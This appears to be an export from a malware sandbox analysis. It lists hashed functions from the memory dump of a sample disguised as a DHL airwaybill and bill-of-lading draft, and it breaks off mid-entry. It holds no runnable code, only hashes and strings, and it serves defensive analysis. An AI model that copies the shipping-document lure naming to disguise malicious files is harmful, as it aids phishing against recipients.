                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: EXT-
                • API String ID: 0-1948896318
                • Opcode ID: 03260f720e3a18314f8704790bb3ea4e3defcb9804f2e7699430ed43f3c61620
                • Instruction ID: 586d241ee4a11427cd9a58c382d8a4e3a42a94f0d1058c0cbf2f7a00e6bf40f7
                • Opcode Fuzzy Hash: 03260f720e3a18314f8704790bb3ea4e3defcb9804f2e7699430ed43f3c61620
                • Instruction Fuzzy Hash: FF41A5725043129BE71ADB75C840B6BBBE8EF88714F850AADF944D7144E774D904C793
                Function 01B7C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: BinaryHash
                • API String ID: 0-2202222882
                • Opcode ID: 8a841c98d273e3282bc22901fdbab263a4071b8484485249d60e5e055807a051
                • Instruction ID: 01c9c6029d3ccae68b057232cd4edcb0ed97635acedb7f65e7d6f32890a031bd
                • Opcode Fuzzy Hash: 8a841c98d273e3282bc22901fdbab263a4071b8484485249d60e5e055807a051
                • Instruction Fuzzy Hash: 9C4167B1D0052EABDF25DA50DC84FEEBB7CAB44714F0045E9EB18A7140DB309E488F94
                Function 01B96B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: #
                • API String ID: 0-1885708031
                • Opcode ID: 4f7ccfce697dd46fb9661870c4c927089dd514ffa2b75a816e362687fbc43f4e
                • Instruction ID: 16da848fdd4bd0d6aaea91bb5b95070aadd808107c0dcd8aeb6ee440c8c23b08
                • Opcode Fuzzy Hash: 4f7ccfce697dd46fb9661870c4c927089dd514ffa2b75a816e362687fbc43f4e
                • Instruction Fuzzy Hash: 9A311631A047999BEF2ADB69C850FAE7BB8DF05704F1440B8F940AB282D775E806CB50
                Function 01B7CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: BinaryName
                • API String ID: 0-215506332
                • Opcode ID: b18e2fee368a3627a26e336a9d1d5b3fec581340516308a54a6f4dbb0368d9a9
                • Instruction ID: 6c6a366e7685d4f8fdedfb3649ccf6e84201b457fb95a8d2a6ed9983d87fd09e
                • Opcode Fuzzy Hash: b18e2fee368a3627a26e336a9d1d5b3fec581340516308a54a6f4dbb0368d9a9
                • Instruction Fuzzy Hash: 7E31BF3690051AAFEB19DA59D845E7BBEB4EB80720F1181ADB925A7350D7309E04EBE0
                Function 01B8892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                Download Yara Rule
                Strings
                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B8895E
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                • API String ID: 0-702105204
                • Opcode ID: a80f4d2c98b1ef6d26b4def72e40f763e841fc166839cfb671736bc471af91ce
                • Instruction ID: 2d910648a1cd91915056ac048273a44dd74fc101c0b84e647e28ad7b6bc9a882
                • Opcode Fuzzy Hash: a80f4d2c98b1ef6d26b4def72e40f763e841fc166839cfb671736bc471af91ce
                • Instruction Fuzzy Hash: 3D012636300201ABEA3D7B5ADC84B6A7F69EF85A94B4425ECF74157552CB20A844C792
                Function 01BA2000 Relevance: .8, Instructions: 757COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: acf7fc8828fec9899f96e62b7f54c106887b3eca305ccddbb350d5abce57bf62
                • Instruction ID: 081cc9166a25ec8a5318c161c4c71a6cad1ed752e568d97afc9f14a41deb6272
                • Opcode Fuzzy Hash: acf7fc8828fec9899f96e62b7f54c106887b3eca305ccddbb350d5abce57bf62
                • Instruction Fuzzy Hash: F742B63160C3419BEB29CF69C890A6BBBE5FF84300F8849EDFA8597250D771D945CB52
                Function 01B98158 Relevance: .6, Instructions: 617COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 675991310cd140876a57d0618b1b283c3c60608ae536ce1c7ecc0befc7147024
                • Instruction ID: 7316f0f9e8d29918914085072590f4ee211c3dcfff85257917d69c9a7fc82655
                • Opcode Fuzzy Hash: 675991310cd140876a57d0618b1b283c3c60608ae536ce1c7ecc0befc7147024
                • Instruction Fuzzy Hash: 78423C75A002198FEF29CF69C881BADBBF5FF49300F1581E9E949AB242D7349985CF50
                Function 01B12840 Relevance: .6, Instructions: 605COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d33e9fd0c43ee7d600bec1fae517955eb05b4f3fe8ccd4a3b64e29bfc5298ad4
                • Instruction ID: 4e4dcc9310e242de577c0f7b36d8ca18b7dc66e82e6e749b62d202288bba209d
                • Opcode Fuzzy Hash: d33e9fd0c43ee7d600bec1fae517955eb05b4f3fe8ccd4a3b64e29bfc5298ad4
                • Instruction Fuzzy Hash: 2B32D070A007558FDB29CF69C8447BEBBF6FFA4304F2442ADD9469B685D739A801CB50
                Function 01BAA118 Relevance: .6, Instructions: 591COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 16e9c8f0c16d4269064d2aedfb921ce371510760fc4ab291519482d4f237481d
                • Instruction ID: 298fa34885486a03fd51234547cbd7bd5b577b883c493838b3a9b72e5e4a1576
                • Opcode Fuzzy Hash: 16e9c8f0c16d4269064d2aedfb921ce371510760fc4ab291519482d4f237481d
                • Instruction Fuzzy Hash: C322AE702086618BEB29CF3DC094376BBF1EF45300F8885DAE9968B286D775E452DB70
                Function 01B24A35 Relevance: .4, Instructions: 423COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                • Instruction ID: 2b891984265983f5475232b71ce767ef046eb570dec05dda34cb426748bb3f26
                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                • Instruction Fuzzy Hash: C7F14D71E0022A9BDF19CF99D580BAEBBF9EF58710F0481A9E909EB640E774DC45CB50
                Function 01B9892B Relevance: .4, Instructions: 386COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5cb6cb1364fc6e0a6af6d6634c038998acf82134937c74da65d3e3df48906054
                • Instruction ID: ed4c673a7792f3184bacdcd0ba5f28f1091b19c5347061a4f6c3b7bd18d150c7
                • Opcode Fuzzy Hash: 5cb6cb1364fc6e0a6af6d6634c038998acf82134937c74da65d3e3df48906054
                • Instruction Fuzzy Hash: A1D1F371A0060E9BDF09CF69C841ABEBBF1EF89304F1981B9D555E7241E739E902CB60
                Function 01B065D0 Relevance: .4, Instructions: 383COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a7add923628f0e343f708c4b40d70cf72ad4221143af47ec0157eb2953097dd3
                • Instruction ID: 849a0112a22ba741686b66c9e4b2a531f80b9b5b5936e302557a0c14dac2aaff
                • Opcode Fuzzy Hash: a7add923628f0e343f708c4b40d70cf72ad4221143af47ec0157eb2953097dd3
                • Instruction Fuzzy Hash: E6E16E71508341CFC71ACF28C490A6ABFE1FF89314F158AADE99587391EB31E915CB92
                Function 01AF8397 Relevance: .4, Instructions: 380COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b60f118235ecd36b396d61d0c38cb3793385f524847bfdc45bd552faaf99fdb2
                • Instruction ID: 0fa8dd2268a4dce8c1710f44ceac5b04f03719d552ce6656a48c53a004cb034d
                • Opcode Fuzzy Hash: b60f118235ecd36b396d61d0c38cb3793385f524847bfdc45bd552faaf99fdb2
                • Instruction Fuzzy Hash: EAD1E471A002069BDF19DFA8C990BBAB7B5FF54304F04466DFA16DB281E738D954CB60
                Function 01B88243 Relevance: .3, Instructions: 322COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction ID: 2cb03cf4253a59400edc568ad1467ac89f567aeb6212bb53cfede1d9c0456e85
                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction Fuzzy Hash: FFB18675A006099FDF28EF99C940EABBBB6FF84704F94449DAA0297791DB34E905CB10
                Function 01B10535 Relevance: .3, Instructions: 300COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                • Instruction ID: 997e03c9b02a9ca3442e9462221bfc9a62bd150a610181b0d42d9db6bd41be55
                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                • Instruction Fuzzy Hash: C4B12531600646AFDB29EBA8C890BBEBBFAEF48300F5501D8E646D7285D734D981DB50
                Function 01B083C0 Relevance: .3, Instructions: 281COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eec2d196f1ca54e4077e30a365c5d7c3a13a29427c7131e5b58f6aa33156fdfa
                • Instruction ID: 6293b12a5e6fec8ef5fe1108113e1a4469dae1f71d3e6b833d314f30a3a5178a
                • Opcode Fuzzy Hash: eec2d196f1ca54e4077e30a365c5d7c3a13a29427c7131e5b58f6aa33156fdfa
                • Instruction Fuzzy Hash: 52C169705083418FD769CF19C494BABBBE8FF98304F4449ADE98987291D775EA08CF92
                Function 01AFC427 Relevance: .3, Instructions: 280COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 93dc784bf7c3a369b8a5bad554c9b2f40a38bbcd75baf6bfd9cca927e475bbc9
                • Instruction ID: a8cbeae752ed040a56bd76ad040edb65908cbb6f7ea7c098ad197acb1344453b
                • Opcode Fuzzy Hash: 93dc784bf7c3a369b8a5bad554c9b2f40a38bbcd75baf6bfd9cca927e475bbc9
                • Instruction Fuzzy Hash: CBB18270A002698BDB78DF69C890BA9B7F1EF44750F0485EDE64AE7245EB70DD85CB20
                Function 01B2E5E7 Relevance: .3, Instructions: 278COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4e17c842040acf8c77024b1b80550307201c78720961998f25d45eab1bcd256c
                • Instruction ID: 3f49adc915458da2a6ed1092e87e3f5b4bdea80645cd69cd310fbd295b67c435
                • Opcode Fuzzy Hash: 4e17c842040acf8c77024b1b80550307201c78720961998f25d45eab1bcd256c
                • Instruction Fuzzy Hash: D8A13731E00625AFEF3ADB59D854BBDBBB8EB00714F0502D9EA14AB290D778DD44CB91
                Function 01B40185 Relevance: .3, Instructions: 276COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 90e58650880a73924431ff9404c56295eae9cdb5fc28787f652ade8686004d00
                • Instruction ID: 825b8582950e1744b4bb3464db59d0b11ae224a28f285adb7f4f2351934e02e4
                • Opcode Fuzzy Hash: 90e58650880a73924431ff9404c56295eae9cdb5fc28787f652ade8686004d00
                • Instruction Fuzzy Hash: 51A1D370B006169FDB2DEF69C990BAAB7B1FF44314F0081A9FB5597281DB34E811EB50
                Function 01BD4500 Relevance: .3, Instructions: 275COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9220ed017d8827c6be1798fe4289022ee2e40fbee86af23e367074928950e1e9
                • Instruction ID: f962eea22821cde547d197112e3225826d512fff550c5b88518b4c3cc69762c7
                • Opcode Fuzzy Hash: 9220ed017d8827c6be1798fe4289022ee2e40fbee86af23e367074928950e1e9
                • Instruction Fuzzy Hash: 51A1CE72A00652EFCB2DDF18C980B5ABBE9FF48744F4505ACF5459BA55E335E800CB91
                Function 01BD2B57 Relevance: .3, Instructions: 266COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                • Instruction ID: 320e56534fd1bae3fe49cd54c60af8376b0a9877cb5c8428dc273f236128ff95
                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                • Instruction Fuzzy Hash: 9DB12871E0065ADFDF2DCFA9C880AADBBB5FF48310F1481A9E915A7354E730A945CB90
                Function 01B860E0 Relevance: .3, Instructions: 264COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5e22c7f1fd8682ec9292bb9bf662183ee5ccd4484fd86e95962e725782280cfe
                • Instruction ID: c238493bdac1dd02bcbc2a3014606cafd710a279206e5b7a48756860b6504a7c
                • Opcode Fuzzy Hash: 5e22c7f1fd8682ec9292bb9bf662183ee5ccd4484fd86e95962e725782280cfe
                • Instruction Fuzzy Hash: 1F918071D00216AFDF19EFA9D884BAEBFB5EB49B10F1541A9E610EB351D734D900CBA0
                Function 01B1E3F0 Relevance: .3, Instructions: 261COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7743b89d611d6b1320d6721952630b394e9a6686c53b7a03a2375bbca7ff226d
                • Instruction ID: c665b13e2a67758e7f32f2bbad8fae78ba70f16c886f181c29f06b44d7830a2d
                • Opcode Fuzzy Hash: 7743b89d611d6b1320d6721952630b394e9a6686c53b7a03a2375bbca7ff226d
                • Instruction Fuzzy Hash: C7914731A00212DFEB2DDB58C480BBDBBA5EFA4714F4681E9ED059B388E738D901C751
                Function 01B56ACC Relevance: .2, Instructions: 226COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 010dac52bb26009b12ccfa3e0b3aa2fefabd32d4d54db5f8e62ecc3aa09a48e1
                • Instruction ID: 69c0b961cf210ad42c7a5c739a7c9393cac65530884baf5e59f7a6c0ad9aaf30
                • Opcode Fuzzy Hash: 010dac52bb26009b12ccfa3e0b3aa2fefabd32d4d54db5f8e62ecc3aa09a48e1
                • Instruction Fuzzy Hash: 5681B4B1E0061A9BDB68CF69C840BBEBBF9FB48700F44856EE945D7640E334D941CBA4
                Function 01BCAB40 Relevance: .2, Instructions: 222COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                • Instruction ID: f39a03df5b12b3c45f2f638c566bcf02a7093a4609289d715875bcae0ea73d46
                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                • Instruction Fuzzy Hash: 88816271A002099FDF1DCFA9C890AAEBBB6FF84710F1485ADD9159B385EB74E901CB50
                Function 01B3E284 Relevance: .2, Instructions: 212COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: faaf01cb2e8e957116374d0508cacad40e95b6672567b77743a1269f6c4c97c4
                • Instruction ID: c1b293dc344fda2579c19a2af5e087ed1cd4faa60f132bb28f5648910a136cea
                • Opcode Fuzzy Hash: faaf01cb2e8e957116374d0508cacad40e95b6672567b77743a1269f6c4c97c4
                • Instruction Fuzzy Hash: 2E816171900609AFDB2ACFA9C880BEEBBF9FF88314F10446AE555A7250D730EC55DB60
                Function 01B1C640 Relevance: .2, Instructions: 206COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 24d7ffc3506e774e6fc0c835c27fb0d320d647f07c64ed0f64547c500f26f13e
                • Instruction ID: cfa65eacb9a35fe73788b69bf7da0e3a68c06d6efa0802a7e505e1022f62cc42
                • Opcode Fuzzy Hash: 24d7ffc3506e774e6fc0c835c27fb0d320d647f07c64ed0f64547c500f26f13e
                • Instruction Fuzzy Hash: 5271BCB5D04629DBCB298F58D8907BEBFB4FF68710F15429EE952AB354D3749800CBA0
                Function 01BB47A0 Relevance: .2, Instructions: 202COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f3e6a173aea9eeba88b47f16808c65009a5d710e9a034d0c58f8a75813e2eff2
                • Instruction ID: 0e1c5a0b306246a96ab56aac895420d6b48ed739f0390c2c1aa24431fbb1c303
                • Opcode Fuzzy Hash: f3e6a173aea9eeba88b47f16808c65009a5d710e9a034d0c58f8a75813e2eff2
                • Instruction Fuzzy Hash: 26719675900205EFDB28DF99D980AEABBF8FF84300F1081DEEA01A7699D7B19940CF54
                Function 01B1260B Relevance: .2, Instructions: 201COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b6810e9efc622de9565226c6c3d53bcab2a9dc14c1e57f14d68343a4b6c1c872
                • Instruction ID: 8409f7200f69e5e6fb2dd4649b591facd86581ee2896f20972ededf13377f892
                • Opcode Fuzzy Hash: b6810e9efc622de9565226c6c3d53bcab2a9dc14c1e57f14d68343a4b6c1c872
                • Instruction Fuzzy Hash: CA71CF356042428FD71ADF28C480B6AB7E5FF84310F5685E9E898CB39ADB38DC45CB91
                Function 01B8035C Relevance: .2, Instructions: 198COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                • Instruction ID: ac97d8e34783e91a8d883d2ad8c63c1fa4c0f9e28c383be361e12f1c93dd5322
                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                • Instruction Fuzzy Hash: 5B718F71A00609AFCF14EFA9C984EDEBBF9FF48740F1045A9E505A7250DB30EA05CB60
                Function 01B962A0 Relevance: .2, Instructions: 198COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cb96f2393606f2b979b22807e5a52c871affeeedf5cea643cd066f34b8ae6548
                • Instruction ID: 4acafc2d4e8924a79d7424963471e8440e5670744fc98437bdee91081e349787
                • Opcode Fuzzy Hash: cb96f2393606f2b979b22807e5a52c871affeeedf5cea643cd066f34b8ae6548
                • Instruction Fuzzy Hash: 95710332200B01AFEF3ACF58C884F5ABBE6EF40760F1585B8E215872A0D775E946DB50
                Function 01B08AA0 Relevance: .2, Instructions: 197COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 235f97cdc69daa88b0e62b4975244f2a791491119a45b15c28864927647739e7
                • Instruction ID: db3978d13449ef5321eec9bf6f8bfa659a2717c198ec1f48ba890f031b8e68a6
                • Opcode Fuzzy Hash: 235f97cdc69daa88b0e62b4975244f2a791491119a45b15c28864927647739e7
                • Instruction Fuzzy Hash: D781D272A047058FEB29CF98C584BAE7BB5FF58310F1542EDD908AB281C7799E40CB90
                Function 01BD8324 Relevance: .2, Instructions: 192COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d50e1f78718cecd0d092c8adada15f31684b3058ae3b3c26107bb38de1660a6a
                • Instruction ID: 2e401bc41146afb8a9ac899cd2394d2e2925cd6e55e9889e79efd6d931419876
                • Opcode Fuzzy Hash: d50e1f78718cecd0d092c8adada15f31684b3058ae3b3c26107bb38de1660a6a
                • Instruction Fuzzy Hash: F8711D71E00209AFDF19DF94C881FEEBBB9FB04365F104299F614A7290E774AA05DB90
                Function 01BBA250 Relevance: .2, Instructions: 184COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0f264b81452e70bb402e706f48d5e62e5f932341b6f79f8a8b90c87bff7b9ad6
